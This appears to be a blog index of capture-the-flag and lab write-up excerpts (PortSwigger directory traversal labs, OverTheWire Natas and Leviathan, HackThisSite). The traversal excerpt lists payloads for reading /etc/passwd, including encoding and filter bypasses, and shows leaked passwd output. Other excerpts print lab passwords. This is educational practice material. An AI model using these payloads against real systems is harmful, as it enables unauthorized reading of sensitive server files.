Home

  • Directory traversal Attacks
    Web Security Academy Labs File path traversal, simple case `image?filename=../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin …` File path traversal, traversal sequences blocked with absolute path bypass image?filename=/etc/passwd File path traversal, traversal sequences stripped non-recursively ?filename=….//….//….//etc/passwd File path traversal, traversal sequences stripped with superfluous URL-decode `?filename=..%252f..%252f..%252fetc/passwd Decodes to ..%2f..%2f..%2fetc/passwd` File path traversal, validation of start of path ?filename=/var/www/images/../../../etc/passw File path traversal, validation of file extension with null… Read more: Directory traversal Attacks
  • Mr Robot Capture the Flag
  • Over The Wire: Natas Solutions Levels 0-10
    The following is my write up to solving the challenges 0-10 in Natas Wargame presented by overthewire.org Level 1 Logining with natas0, natas0 like directions say.  A pop up box tells me the password is somewhere on that page.  Inspecting the source, I can see the password. gtVrDuiDfck831PqWsLEZy5gyDz1clto Level 2 Viewing the source code I find a link to another file.  Navigating to the /file directory I get… Read more: Over The Wire: Natas Solutions Levels 0-10
  • Overthewire: Leviathan Solutions
    The following is a walk through on how to solve the Leviathan wargame featured on Overthewire.org.  For this wargame, we ssh on port 2223 to access the levels.  Passwords for each level reside in the /etc/leviathan_pass directory.  Files for each level reside in the /home directory. The username and password is provided for level 0. username: leviathan0 password: leviathan0 Level 0 ssh levianthan0@leviathan.labs.overthewire.org -p 2223 When prompted, enter… Read more: Overthewire: Leviathan Solutions
  • Hackthissite: Javascript Mission Solutions
    Level 1 Challenge: This level is super easy.  All you have to do is check the source code for the answer.  You will see the following: As we can see, the function check(x) determines if x == cookies, if so we will get an alert that says ‘win!’.  Let’s enter ‘cookies’ as our password.  Bingo! Level 2 Challenge: We need to disable javascript to complete the mission.  You… Read more: Hackthissite: Javascript Mission Solutions